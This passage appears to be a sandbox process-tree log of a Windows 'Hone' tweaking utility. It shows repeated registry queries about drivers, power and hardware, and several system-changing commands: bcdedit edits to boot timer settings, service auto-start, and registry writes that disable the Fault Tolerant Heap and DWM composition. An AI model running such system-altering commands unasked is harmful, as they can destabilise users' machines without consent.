        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
        6⤵
        
        PID:1220
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:3080
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
        6⤵
        
        PID:3864
      - C:\Windows\system32\find.exe
        
        find "0x0"
        6⤵
        
        PID:4572
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
        6⤵
        
        PID:4876
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:2548
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
        6⤵
        
        PID:3792
      - C:\Windows\system32\find.exe
        
        find "0x0"
        6⤵
        
        PID:3264
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
        6⤵
        
        PID:4468
      - C:\Windows\system32\find.exe
        
        find "0x4"
        6⤵
        
        PID:1396
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
        6⤵
        
        PID:3860
      - C:\Windows\system32\find.exe
        
        find "0x3"
        6⤵
        
        PID:520
      - C:\Windows\system32\powercfg.exe
        
        powercfg /GetActiveScheme
        6⤵
        Power Settings
        
        PID:4712
      - C:\Windows\system32\find.exe
        
        find "Hone"
        6⤵
        
        PID:3344
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
        6⤵
        
        PID:4828
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NpiTweaks"
        6⤵
        
        PID:2820
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "TCPIP"
        6⤵
        
        PID:1676
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
        6⤵
        
        PID:1200
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "MemoryTweaks"
        6⤵
        
        PID:2600
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "InternetTweaks"
        6⤵
        
        PID:1900
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "ServicesTweaks"
        6⤵
        
        PID:4284
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "DebloatTweaks"
        6⤵
        
        PID:4444
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
        6⤵
        
        PID:3332
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "AffinityTweaks"
        6⤵
        
        PID:1824
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
        6⤵
        
        PID:1736
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
        6⤵
        
        PID:4988
      - C:\Windows\system32\find.exe
        
        find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
        6⤵
        
        PID:1720
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
        6⤵
        
        PID:1976
      - C:\Windows\system32\find.exe
        
        find "0x400"
        6⤵
        
        PID:4024
      - C:\Windows\system32\sc.exe
        
        sc query STR
        6⤵
        Launches sc.exe
        
        PID:3180
      - C:\Windows\system32\find.exe
        
        find "RUNNING"
        6⤵
        
        PID:3404
      - C:\Windows\system32\sc.exe
        
        sc query HoneAudio
        6⤵
        Launches sc.exe
        
        PID:788
      - C:\Windows\system32\find.exe
        
        find "RUNNING"
        6⤵
        
        PID:3892
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_Battery Get BatteryStatus
        6⤵
        
        PID:1376
      - C:\Windows\system32\find.exe
        
        find "1"
        6⤵
        
        PID:4596
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
        6⤵
        
        PID:2372
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_VideoController get VideoProcessor /value
        7⤵
        
        PID:2620
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:1180
      - C:\Windows\system32\find.exe
        
        find "GeForce"
        6⤵
        
        PID:1732
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:4308
      - C:\Windows\system32\find.exe
        
        find "NVIDIA"
        6⤵
        
        PID:1156
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:1576
      - C:\Windows\system32\find.exe
        
        find "RTX"
        6⤵
        
        PID:5076
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:3416
      - C:\Windows\system32\find.exe
        
        find "GTX"
        6⤵
        
        PID:1540
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:4472
      - C:\Windows\system32\find.exe
        
        find "AMD"
        6⤵
        
        PID:3360
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:1208
      - C:\Windows\system32\find.exe
        
        find "Ryzen"
        6⤵
        
        PID:756
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:2088
      - C:\Windows\system32\find.exe
        
        find "Intel"
        6⤵
        
        PID:3328
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:3796
      - C:\Windows\system32\find.exe
        
        find "UHD"
        6⤵
        
        PID:4432
      - C:\Windows\system32\sc.exe
        
        sc config "STR" start= auto
        6⤵
        Launches sc.exe
        
        PID:4820
      - C:\Windows\system32\net.exe
        
        net start STR
        6⤵
        
        PID:1508
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start STR
        7⤵
        
        PID:2640
      - C:\Windows\system32\sc.exe
        
        sc config "STR" start=auto
        6⤵
        Launches sc.exe
        
        PID:2232
      - C:\Windows\system32\net.exe
        
        net start STR
        6⤵
        
        PID:3388
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start STR
        7⤵
        
        PID:3636
      - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set disabledynamictick yes
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:8
      - C:\Windows\system32\bcdedit.exe
        
        bcdedit /deletevalue useplatformclock
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:4868
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic OS get buildnumber /value
        6⤵
        
        PID:3380
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic OS get buildnumber /value
        7⤵
        
        PID:820
      - C:\Windows\system32\bcdedit.exe
        
        bcdedit /deletevalue useplatformtick
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:2984
      - C:\Windows\system32\mode.com
        
        Mode 130,45
        6⤵
        
        PID:1044
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
        6⤵
        
        PID:2296
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get PNPDeviceID
        7⤵
        
        PID:1168
        
        C:\Windows\system32\findstr.exe
        
        findstr /L "VEN_"
        7⤵
        
        PID:2224
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
        6⤵
        
        PID:3040
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:1116
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
        6⤵
        
        PID:1788
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
        6⤵
        
        PID:1548
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_NetworkAdapter get PNPDeviceID
        7⤵
        
        PID:2160
        
        C:\Windows\system32\findstr.exe
        
        findstr /L "VEN_"
        7⤵
        
        PID:476
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
        6⤵
        
        PID:320
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:216
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
        6⤵
        
        PID:4700
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
        6⤵
        
        PID:1204
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get TotalVisibleMemorySize /value
        7⤵
        
        PID:4648
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
        6⤵
        
        PID:3476
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
        7⤵
        
        PID:3788
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NVTTweaks"
        6⤵
        
        PID:2156
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
        6⤵
        
        PID:1776
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
        7⤵
        
        PID:1616
        
        C:\Windows\system32\findstr.exe
        
        findstr "HKEY"
        7⤵
        
        PID:4412
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
        6⤵
        
        PID:4492
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:1764
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
        6⤵
        
        PID:1088
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:2684
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
        6⤵
        
        PID:4188
      - C:\Windows\system32\find.exe
        
        find "0x0"
        6⤵
        
        PID:4380
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
        6⤵
        
        PID:672
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:4104
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
        6⤵
        
        PID:4736
      - C:\Windows\system32\find.exe
        
        find "0x0"
        6⤵
        
        PID:1220
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
        6⤵
        
        PID:3560
      - C:\Windows\system32\find.exe
        
        find "0x4"
        6⤵
        
        PID:3864
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
        6⤵
        
        PID:4540
      - C:\Windows\system32\find.exe
        
        find "0x3"
        6⤵
        
        PID:4876
      - C:\Windows\system32\powercfg.exe
        
        powercfg /GetActiveScheme
        6⤵
        Power Settings
        
        PID:2364
      - C:\Windows\system32\find.exe
        
        find "Hone"
        6⤵
        
        PID:3792
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
        6⤵
        
        PID:2052
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NpiTweaks"
        6⤵
        
        PID:4416
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "TCPIP"
        6⤵
        
        PID:2592
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
        6⤵
        
        PID:1076
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "MemoryTweaks"
        6⤵
        
        PID:4592
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "InternetTweaks"
        6⤵
        
        PID:4568
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "ServicesTweaks"
        6⤵
        
        PID:4000
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "DebloatTweaks"
        6⤵
        
        PID:924
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
        6⤵
        
        PID:1676
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "AffinityTweaks"
        6⤵
        
        PID:2976
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
        6⤵
        
        PID:2084
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
        6⤵
        
        PID:2264
      - C:\Windows\system32\find.exe
        
        find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
        6⤵
        
        PID:3836
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
        6⤵
        
        PID:2376
      - C:\Windows\system32\find.exe
        
        find "0x400"
        6⤵
        
        PID:2560
      - C:\Windows\system32\sc.exe
        
        sc query STR
        6⤵
        Launches sc.exe
        
        PID:2580
      - C:\Windows\system32\find.exe
        
        find "RUNNING"
        6⤵
        
        PID:976
      - C:\Windows\system32\sc.exe
        
        sc query HoneAudio
        6⤵
        Launches sc.exe
        
        PID:4808
      - C:\Windows\system32\find.exe
        
        find "RUNNING"
        6⤵
        
        PID:4988
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_Battery Get BatteryStatus
        6⤵
        
        PID:1176
      - C:\Windows\system32\find.exe
        
        find "1"
        6⤵
        
        PID:1976
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
        6⤵
        
        PID:1896
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_VideoController get VideoProcessor /value
        7⤵
        
        PID:4560
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:4384
      - C:\Windows\system32\find.exe
        
        find "GeForce"
        6⤵
        
        PID:5004
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:4596
      - C:\Windows\system32\find.exe
        
        find "NVIDIA"
        6⤵
        
        PID:2528
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:3708
      - C:\Windows\system32\find.exe
        
        find "RTX"
        6⤵
        
        PID:2620
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:4792
      - C:\Windows\system32\find.exe
        
        find "GTX"
        6⤵
        
        PID:1984
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:4308
      - C:\Windows\system32\find.exe
        
        find "AMD"
        6⤵
        
        PID:2148
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:1820
      - C:\Windows\system32\find.exe
        
        find "Ryzen"
        6⤵
        
        PID:1384
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:1144
      - C:\Windows\system32\find.exe
        
        find "Intel"
        6⤵
        
        PID:2972
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:548
      - C:\Windows\system32\find.exe
        
        find "UHD"
        6⤵
        
        PID:4624
      - C:\Windows\System32\choice.exe
        
        C:\Windows\System32\choice.exe /c:12X /n /m " >:"
        6⤵
        
        PID:4932
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\PriorityControl" /v "Win32PrioritySeparation" /t REG_DWORD /d "38" /f
        6⤵
        
        PID:3988
      - C:\Windows\system32\mode.com
        
        Mode 130,45
        6⤵
        
        PID:3016
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
        6⤵
        
        PID:3900
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get PNPDeviceID
        7⤵
        
        PID:3796
        
        C:\Windows\system32\findstr.exe
        
        findstr /L "VEN_"
        7⤵
        
        PID:4432
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
        6⤵
        
        PID:2980
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:1816
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
        6⤵
        
        PID:2640
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
        6⤵
        
        PID:544
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_NetworkAdapter get PNPDeviceID
        7⤵
        
        PID:1092
        
        C:\Windows\system32\findstr.exe
        
        findstr /L "VEN_"
        7⤵
        
        PID:3636
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
        6⤵
        
        PID:3656
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:3196
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
        6⤵
        
        PID:820
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
        6⤵
        
        PID:4228
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get TotalVisibleMemorySize /value
        7⤵
        
        PID:3984
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
        6⤵
        
        PID:224
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
        7⤵
        
        PID:2140
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NVTTweaks"
        6⤵
        
        PID:2456
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
        6⤵
        
        PID:2296
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
        7⤵
        
        PID:3040
        
        C:\Windows\system32\findstr.exe
        
        findstr "HKEY"
        7⤵
        
        PID:1108
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
        6⤵
        
        PID:3776
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:560
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
        6⤵
        
        PID:3544
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:460
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
        6⤵
        
        PID:3516
      - C:\Windows\system32\find.exe
        
        find "0x0"
        6⤵
        
        PID:4700
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
        6⤵
        
        PID:4708
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:4092
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
        6⤵
        
        PID:2492
      - C:\Windows\system32\find.exe
        
        find "0x0"
        6⤵
        
        PID:3632
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
        6⤵
        
        PID:2656
      - C:\Windows\system32\find.exe
        
        find "0x4"
        6⤵
        
        PID:2156
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
        6⤵
        
        PID:1136
      - C:\Windows\system32\find.exe
        
        find "0x3"
        6⤵
        
        PID:4412
      - C:\Windows\system32\powercfg.exe
        
        powercfg /GetActiveScheme
        6⤵
        Power Settings
        
        PID:2388
      - C:\Windows\system32\find.exe
        
        find "Hone"
        6⤵
        
        PID:3772
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
        6⤵
        
        PID:844
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NpiTweaks"
        6⤵
        
        PID:4028
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "TCPIP"
        6⤵
        
        PID:3660
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
        6⤵
        
        PID:2304
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "MemoryTweaks"
        6⤵
        
        PID:2800
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "InternetTweaks"
        6⤵
        
        PID:3004
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "ServicesTweaks"
        6⤵
        
        PID:3080
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "DebloatTweaks"
        6⤵
        
        PID:4360
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
        6⤵
        
        PID:3728
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "AffinityTweaks"
        6⤵
        
        PID:2292
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
        6⤵
        
        PID:2548
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
        6⤵
        
        PID:1716
      - C:\Windows\system32\find.exe
        
        find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
        6⤵
        
        PID:4876
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
        6⤵
        
        PID:4448
      - C:\Windows\system32\find.exe
        
        find "0x400"
        6⤵
        
        PID:4752
      - C:\Windows\system32\sc.exe
        
        sc query STR
        6⤵
        Launches sc.exe
        
        PID:3832
      - C:\Windows\system32\find.exe
        
        find "RUNNING"
        6⤵
        
        PID:4416
      - C:\Windows\system32\sc.exe
        
        sc query HoneAudio
        6⤵
        Launches sc.exe
        
        PID:4048
      - C:\Windows\system32\find.exe
        
        find "RUNNING"
        6⤵
        
        PID:1076
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_Battery Get BatteryStatus
        6⤵
        
        PID:1112
      - C:\Windows\system32\find.exe
        
        find "1"
        6⤵
        
        PID:4568
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
        6⤵
        
        PID:2132
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_VideoController get VideoProcessor /value
        7⤵
        
        PID:1572
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:456
      - C:\Windows\system32\find.exe
        
        find "GeForce"
        6⤵
        
        PID:4892
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:3332
      - C:\Windows\system32\find.exe
        
        find "NVIDIA"
        6⤵
        
        PID:2608
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:4904
      - C:\Windows\system32\find.exe
        
        find "RTX"
        6⤵
        
        PID:2012
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:3100
      - C:\Windows\system32\find.exe
        
        find "GTX"
        6⤵
        
        PID:1720
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:2096
      - C:\Windows\system32\find.exe
        
        find "AMD"
        6⤵
        
        PID:3180
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:1176
      - C:\Windows\system32\find.exe
        
        find "Ryzen"
        6⤵
        
        PID:1536
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:4644
      - C:\Windows\system32\find.exe
        
        find "Intel"
        6⤵
        
        PID:788
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:3392
      - C:\Windows\system32\find.exe
        
        find "UHD"
        6⤵
        
        PID:1748
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Hone" /v "MemoryTweaks" /f
        6⤵
        
        PID:2936
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Microsoft\FTH" /v "Enabled" /t Reg_DWORD /d "0" /f
        6⤵
        
        PID:4276
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\DWM" /v "Composition" /t REG_DWORD /d "0" /f
        6⤵
        
        PID:4584
      - C:\Windows\system32\reg.exe
        
